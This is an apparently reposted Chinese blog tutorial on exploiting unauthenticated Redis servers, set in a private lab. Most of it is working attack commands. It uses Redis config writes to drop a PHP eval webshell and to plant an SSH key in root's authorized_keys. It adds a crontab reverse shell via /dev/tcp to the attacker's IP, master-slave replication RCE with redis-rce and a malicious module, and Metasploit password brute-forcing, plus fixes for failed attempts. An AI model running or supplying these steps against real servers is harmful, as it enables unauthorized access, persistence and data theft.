目錄

1.了解redis

2.redis漏洞原理

3.redis漏洞復(fù)現(xiàn)

3.1 安裝redis

3.1.1 Linux安裝redis

?3.1.2 windows安裝redis

4.redis漏洞利用

4.1利用redis漏洞寫webshell

4.1.1利用前提

4.1.2上傳webshell

4.2利用redis漏洞ssh密鑰連接

4.2.1 ssh密鑰連接

4.2.2 利用前提

4.2.3 客戶端生成密鑰

?4.2.4注意

4.3利用crontab反彈shell

4.3.1下載nc

4.3.2 上傳反彈shell命令

4.3.3解決redis crontab反彈shell失敗

4.4利用redis主從復(fù)制反彈shell

4.4.1 了解redis主從復(fù)制

4.4.2主從復(fù)制反彈shell

5.利用msf破解redis密碼

1.了解redis

Redis（Remote Dictionary Server )，即遠(yuǎn)程字典服務(wù)，是一個(gè)開源的使用ANSI C語言編寫、支持網(wǎng)絡(luò)、可基于內(nèi)存亦可持久化的日志型、Key-Value數(shù)據(jù)庫，并提供多種語言的API。從2010年3月15日起，Redis的開發(fā)工作由VMware主持。從2013年5月開始，Redis的開發(fā)由Pivota贊助。

2.redis漏洞原理

Redis默認(rèn)情況下是綁定在0.0.0.0:6379端口的，如果沒有設(shè)置密碼（一般密碼為空）或者密碼為弱密碼的情況下并且也沒有進(jìn)行有效保護(hù)措施，那么處于公網(wǎng)的redis服務(wù)就會(huì)被任意的用戶未授權(quán)訪問，讀取數(shù)據(jù)，甚至利用redis自身的命令，進(jìn)行寫入文件操作，這樣就會(huì)惡意攻擊者利用redis未授權(quán)漏洞進(jìn)行進(jìn)一步攻擊。

3.redis漏洞復(fù)現(xiàn)

我看很多redis漏洞復(fù)現(xiàn)靶機(jī)和攻擊機(jī)都是linux系統(tǒng)的，如果你是這樣的那么網(wǎng)上比較多這樣復(fù)現(xiàn)文章，也比較簡(jiǎn)單。本文是攻擊機(jī)是windows和靶機(jī)是Linux，kali虛擬機(jī)之間的漏洞復(fù)現(xiàn)。

攻擊機(jī)：window10 專業(yè)版 ip 192.168.43.102

靶機(jī)：linux kali ip192.168.43.141

3.1 安裝redis

3.1.1 Linux安裝redis

因?yàn)槲抑耙呀?jīng)安裝過了就不把步驟截圖了，代碼步驟已經(jīng)給大家寫清楚了，實(shí)在不會(huì)就自己百度?？赡茉趍ake時(shí)候報(bào)錯(cuò)，可能是你gcc沒有下載。

第一步 wget http://download.redis.io/releases/redis-2.8.17.tar.gz#下載redis
第二步 tar xzf redis-2.8.17.tar.gz#解壓安裝包
第三步 cd redis-2.8.17 #進(jìn)入redis文件夾
第四步 make #在redis-2.8.17文件夾下執(zhí)行make
第五步 cd src#進(jìn)入redis-2.8.17文件夾下的src文件夾
第六步 cp redis-server /usr/bin
第七步 cp redis-cli /usr/bin #將redis-server和redis-cli拷貝到/usr/bin目錄下（這樣啟動(dòng)redis-server和redis-cli就不用每次都進(jìn)入安裝目錄了）
第八步 cp redis-conf /etc/ #返回目錄redis-2.8.17，將redis.conf拷貝到/etc/目錄下
第九步 redis-server /etc/redis.conf #使用/etc/目錄下的reids.conf文件中的配置啟動(dòng)redis服務(wù)

可以看到我在任何地方都可以啟動(dòng)redis服務(wù)端。

?3.1.2 windows安裝redis

首先自己去下載redis壓縮包，直接解壓。官網(wǎng)自己去下載。在redis文件夾下運(yùn)行cmd，如果你的redis服務(wù)端開啟，執(zhí)行下面代碼就進(jìn)行連接

redis-cli.exe -h 192.168.43.141 #ip是你靶機(jī)的IP地址，端口可加可不加。
#redis-cli.exe -h 192.168.43.141 -p 6379
#如果是linux連接
redis-cli -h ip

?

?到目前為止redis未授權(quán)漏洞我們已經(jīng)復(fù)現(xiàn)成功，接下來就是漏洞利用。

注意：如果是版本比較高的redis需要修改redis的配置文件，linux是redis.conf。如果是windows配置文件是redis.windows.conf。將bind前面#注釋符去掉，將protected-mode 后面改為no。

?

4.redis漏洞利用

4.1利用redis漏洞寫webshell

4.1.1利用前提

1.靶機(jī)redis鏈接未授權(quán)，在攻擊機(jī)上能用redis-cli連上，如上圖，并未登陸驗(yàn)證

2.開了web服務(wù)器，并且知道路徑（如利用phpinfo，或者錯(cuò)誤爆路經(jīng)），還需要具有文件讀寫增刪改查權(quán)限（開啟web服務(wù)器，就可以利用url使用蟻劍進(jìn)行連接）

4.1.2上傳webshell

config get dir #查看redis數(shù)據(jù)庫路徑
config set dir /root/redis-2.8.17# #修改靶機(jī)Redis數(shù)據(jù)庫路徑
config set dbfilename 22.php #生成22.php文件
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"#將一句話木馬寫入文件中
#"\r\n\r\n"是換行的意思，用redis寫入文件會(huì)自帶一些版本信息，如果不換行可能導(dǎo)致無法執(zhí)行。
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"#上傳木馬可以通過蟻劍連接
save#保存

?經(jīng)過上述代碼操作，可以看到22.php文件成功寫入到/root/redis-2.8.17文件夾下，且一句話木馬成功寫入22.php文件里面。如果開啟web服務(wù)就可以將一句話木馬寫入網(wǎng)站目錄下，那么利用一句話木馬就可以得到敏感信息?；蛘呖梢酝ㄟ^蟻劍連接。具體步驟可以看下面。蟻劍連接密碼就是whoami,不會(huì)蟻劍這個(gè)自己再學(xué)習(xí)這方面知識(shí)了。

?

?

?

4.2利用redis漏洞ssh密鑰連接

4.2.1 ssh密鑰連接

大家都知道可以通過ssh遠(yuǎn)程登錄另外一臺(tái)電腦。ssh登錄有兩種一個(gè)是密碼登錄，一個(gè)是密鑰登錄我們主要看密鑰登錄是什么流程，公鑰登錄是為了解決每次登錄服務(wù)器都要輸入密碼的問題，流行使用RSA加密方案，主要流程包含：

1、客戶端生成RSA公鑰和私鑰

2、客戶端將自己的公鑰存放到服務(wù)器

3、客戶端請(qǐng)求連接服務(wù)器，服務(wù)器將一個(gè)隨機(jī)字符串發(fā)送給客戶端

4、客戶端根據(jù)自己的私鑰加密這個(gè)隨機(jī)字符串之后再發(fā)送給服務(wù)器

5、服務(wù)器接受到加密后的字符串之后用公鑰解密，如果正確就讓客戶端登錄，否則拒絕。這樣就不用使用密碼了。

4.2.2 利用前提

1.當(dāng)redis以root身份運(yùn)行。

2.靶機(jī)redis鏈接未授權(quán)，在攻擊機(jī)上能用redis-cli連上，如上圖，并未登陸驗(yàn)證。

3.存在/root/.ssh目錄，如果不存在我們可以通過一句話木馬連接蟻劍創(chuàng)建目錄不過可能進(jìn)不去root目錄權(quán)限問題可能或者自己mkdir一個(gè)目錄畢竟是自己搭建靶場(chǎng)。因?yàn)?ssh是隱藏目錄可以通過ls -la查看有沒有。

4.2.3 客戶端生成密鑰

我是windows沒有辦法直接生成密鑰所以需要安裝git,可以自己百度安裝流程，從官網(wǎng)下載的安裝包。如果不想這么麻煩可以在靶機(jī)linux系統(tǒng)直接運(yùn)行代碼生成密鑰再將密鑰復(fù)制粘貼出來，或者開啟web服務(wù)下載，畢竟我們只是演練。

1.安裝好git,在桌面右擊進(jìn)入Git Bash Here?。輸入下面指令生成密鑰。在你用戶名文件夾下.ssh文件里面就會(huì)出現(xiàn)公鑰和私鑰。

ssh-keygen -t rsa

?

?2.生成密鑰之后我們可以將公鑰id_rsa.pub里面內(nèi)容復(fù)制粘貼到key.txt文件中，再上傳到靶機(jī)上面

?3.通過以下命令將公鑰上傳到靶機(jī)。

type key.txt | redis-cli.exe -h 192.168.43.141 -x set xxx#如果是linux 將type換成cat
#將公鑰作為value插入到數(shù)據(jù)庫中，key隨便啥值。
redis-cli.exe -h 192.168.43.141 config set dir /root/.ssh
#修改redis數(shù)據(jù)庫路徑
redis-cli.exe -h 192.168.43.141 config set dbfilename authorized_keys
#生成緩沖文件authorized_keys
redis-cli.exe -h 192.168.43.141 save
#保存
ssh -i id_rsa root@192.168.43.141
#連接

?

可以看到之前是沒有authorized_keys文件，執(zhí)行命令之后在/root/.ssh下面產(chǎn)生了公鑰文件。

?4.成功利用ssh私鑰進(jìn)行連接。

?4.2.4注意

1.如果你是linux系統(tǒng)使用cat,是windows系統(tǒng)使用type.

2.如果你是windows那你利用ssh密鑰連接運(yùn)行ssh -i id_rsa root@192.168.43.141需要在.ssh目錄下，因?yàn)闄?quán)限問題。

3.你利用redis上傳公鑰時(shí)候運(yùn)行代碼是在你解壓的redis文件下運(yùn)行。

4.文件名必須是authorized_keys,由配置文件決定的。

4.3利用crontab反彈shell

首先大家要知道crontab是什么，主要是用來定時(shí)執(zhí)行某些任務(wù)，如果我們把一些命令放入指定文件里面，那么程序會(huì)定時(shí)去執(zhí)行，相當(dāng)于是每隔一段時(shí)間自動(dòng)執(zhí)行命令，不用擔(dān)心當(dāng)我們關(guān)閉會(huì)話或者目標(biāo)主機(jī)關(guān)機(jī)，這個(gè)對(duì)我們后期持久化滲透是很有幫助的。

4.3.1下載nc

如果你的攻擊機(jī)是kali是自帶nc,如果像我一樣是windows需要自己去下載一個(gè)nc,安裝很簡(jiǎn)單，nc下載地址netcat 1.11 for Win32/Win64，安裝好nc,打開cmd,輸入命令監(jiān)聽你反彈shell的端口，這個(gè)端口隨便設(shè)置的，主要取決你反彈命令里面設(shè)置的端口。

nc -lvp 8888

4.3.2 上傳反彈shell命令

首先我們需要定位到我們需要的文件路徑下，因?yàn)樵?var/spool/cron/crontabs/下如果文件名是root，那么會(huì)定時(shí)執(zhí)行里面的命令。這個(gè)目錄不同操作系統(tǒng)是不一樣我的是debain的。具體步驟如下：

redis-cli.exe -h 192.168.43.141
config set dir /var/spool/cron/crontabs
config set dbfilename root
set xxx "\n\n* * * * * /bin/bash -i>&/dev/tcp/192.168.43.102/8888 0>&1\n\n"
#前面五個(gè)星號(hào)分別表示 分 時(shí) 天 月 周 一般用于具體的定時(shí)時(shí)間。后面就是執(zhí)行的命令。\n\n是換行前面已經(jīng)說過，因?yàn)閞edis會(huì)出現(xiàn)亂碼，可以通過上傳的root文件看到有亂碼。
save

可以看到成功上傳反彈命令

4.3.3解決redis crontab反彈shell失敗

當(dāng)我們攻擊機(jī)利用nc開啟8888端口監(jiān)聽，一直沒有收到反彈的shell,所以我進(jìn)行了一下排查原因，也許你們也會(huì)需要同樣情況

第一個(gè)：首先你要看一下你的cron啟動(dòng)沒有，可以先查看狀態(tài)如果是running,那就不用管，如果不是就需要啟動(dòng)一下，一般而言cron都是自啟動(dòng)的。所以一般來說不會(huì)是這個(gè)出問題。

service crond restart#重啟
service crond start#啟動(dòng)
service crond stop#關(guān)閉
service crond status#查看狀態(tài)

第二個(gè)：我發(fā)現(xiàn)我的cron啟動(dòng)了但是依然無法反彈shell,去找了資料知道利用redis未授權(quán)訪問寫的任務(wù)計(jì)劃文件都有亂碼，這是亂碼來自redis的緩存數(shù)據(jù)，這個(gè)問題無法解決的。centos會(huì)忽略亂碼去執(zhí)行格式正確的任務(wù)計(jì)劃，而ubuntu和debian并不會(huì)忽略這些亂碼，所以導(dǎo)致命令執(zhí)行失敗。我們手動(dòng)刪除亂碼發(fā)現(xiàn)反彈仍然失敗，查看資料發(fā)現(xiàn)我們還需要關(guān)注以下問題。

第三個(gè):root文件的權(quán)限必須為600也就是說是rw-----------

chmod 600 root#修改root文件權(quán)限

第四個(gè):我們反彈shell的/bin/sh是bash，而我的靶機(jī)的bin/sh是dash ,所以運(yùn)行出錯(cuò)。我們需要通過以下命令查看和修改。

ls -al /bin/sh#查看運(yùn)行環(huán)境
ln -s -f bash /bin/sh#修改為bash

?當(dāng)我們按照上述步驟修改完成可以看到反彈成功。但是ifconfig不能執(zhí)行可以通過下面代碼是的ifconfig成功執(zhí)行。?

ln -s /usr/sbin/ifconfig /usr/bin/ifconfig

總結(jié):計(jì)時(shí)任務(wù)反彈shell 如果是ubuntu和debian操作系統(tǒng)這個(gè)就沒有辦法利用成功，centos操作系統(tǒng)是可以的利用的

4.4利用redis主從復(fù)制反彈shell

4.4.1 了解redis主從復(fù)制

redis主從復(fù)制我們簡(jiǎn)單理解為有兩臺(tái)redis服務(wù)器,一個(gè)是主，一個(gè)是從，兩臺(tái)服務(wù)器的數(shù)據(jù)是一樣的，主服務(wù)器負(fù)責(zé)寫入數(shù)據(jù)，從服務(wù)器負(fù)責(zé)讀取數(shù)據(jù)。一般一個(gè)主服務(wù)器有好幾個(gè)從服務(wù)器，且從服務(wù)器可能也是其他redis服務(wù)器的主服務(wù)器。這樣的好處就是如果主服務(wù)器或者一個(gè)從服務(wù)器崩潰不會(huì)影響數(shù)據(jù)完整性，且讀寫分開，減輕服務(wù)器壓力。這個(gè)大家自己找一些資料了解一下。

4.4.2主從復(fù)制反彈shell

如果要是的利用成功需要先下載攻擊代碼，步驟已經(jīng)給到大家。這步驟是linux的下載步驟，windows可以直接將這個(gè)linux里面redis-rce文件夾復(fù)制過來就行了。當(dāng)然module.so已經(jīng)移過來了。這個(gè)exp我感覺是針對(duì)Linux的，可能跟他調(diào)用命令函數(shù)有關(guān)是linux函數(shù)。windows系統(tǒng)可以產(chǎn)生shell但是寫命令沒有反應(yīng)，所以這里我的靶機(jī)和攻擊機(jī)就要換過來。因?yàn)槲疫@個(gè)是我在家實(shí)驗(yàn)的所以網(wǎng)段和上面就不一樣了。這里還有注意如果利用redis主從復(fù)制redis版本要是4.x或者5.x

靶機(jī)：kali 192.168.3.231

攻擊機(jī) windows 192.168.3.207

第一步：git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
        #下載RedisModules-ExecuteCommand
第二步：git clone https://github.com/Ridter/redis-rce
        #下載redis-rce
第三步：cd RedisModules-ExecuteCommand
第四步:make
        #進(jìn)入RedisModules-ExecuteCommand 使用make進(jìn)行編譯
第五步:mv module.so /root/redis-rce
        #編譯之后將module.so移到redis-rce
第六步：cd /root/redis-rce
第七步：python3 redis-rce.py -r 192.168.3.207 -L 192.168.3.231 -f module.so  
        #進(jìn)入到redis-rce 執(zhí)行命令，-r是目標(biāo)IP -L是攻擊機(jī)ip     

靶機(jī)開啟redis服務(wù)端。

?攻擊機(jī)利用redis進(jìn)行連接。

?我直接將redis-rce復(fù)制到windows里面

運(yùn)行代碼發(fā)現(xiàn)報(bào)錯(cuò)，排查了一下是因?yàn)閟ix模塊沒有安裝,通過以下命令進(jìn)行安裝.，如果大家運(yùn)行報(bào)錯(cuò)可以看看代碼導(dǎo)入的模塊有沒有安裝。

pip install six

?

?安裝six之后就沒有報(bào)錯(cuò)了，可以看到一些參數(shù)，-r指的是靶機(jī)IP? -L指的是攻擊機(jī)IP，如果沒有指定端口就會(huì)使用默認(rèn)端口。

運(yùn)行以下命令，會(huì)讓你選擇，可以輸入i,r,e分別對(duì)應(yīng)交互式shell,反彈shell和退出吧。

python redis-rce.py -r 192.168.3.231 -L 192.168.3.207 -f module.so

我選擇交互式shell ,輸入命令可以看到用戶是root 還有網(wǎng)絡(luò)信息。當(dāng)然可以選擇反彈shell。需要現(xiàn)在攻擊機(jī)利用nc開啟監(jiān)聽。等待片刻就可以了。

?

注意：如果redis需要密碼，可以加-a參數(shù)。

5.利用msf破解redis密碼

攻擊機(jī)：kali 192.168.3.231

靶機(jī)：windows 192.168.3.207

首先我們將redis設(shè)置一個(gè)密碼，找到配置文件設(shè)置一個(gè)密碼。

?msf是kali自帶的一個(gè)攻擊工具，里面有一些針對(duì)出現(xiàn)漏洞的exp。不過缺點(diǎn)就是更新不會(huì)很及時(shí)。

msfdb run#開啟msf
search redis#查看有關(guān)redis的模塊
use 5#選擇5號(hào)模塊
show options #展示需要設(shè)置的參數(shù)
set RHOST 192.168.3.207 #設(shè)置靶機(jī)的ip
run #運(yùn)行模塊

?

?可以看到成功爆出密碼，不過這個(gè)使用的是msf自帶的密碼字典，所以對(duì)于復(fù)雜密碼就不行了，可以使用自己字典?？梢允褂镁幪?hào)為2的redis_server密碼登錄驗(yàn)證。可以使用編號(hào)為4的file_upload進(jìn)行文件上傳。可以上傳一句話木馬和密鑰。原理和客戶端連接是一樣的。

?好了終于將redis漏洞寫完了，大家最好不用windows,太麻煩了。不過用來也沒有關(guān)系，我已經(jīng)給大家將坑填完了?？傊@通過自己努力解決了很多問題，也是一種成就感。大家加油啊文章來源地址http://www.zghlxwxcb.cn/news/detail-403176.html

到了這里，關(guān)于Redis未授權(quán)漏洞復(fù)現(xiàn)及利用（window,linux）的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！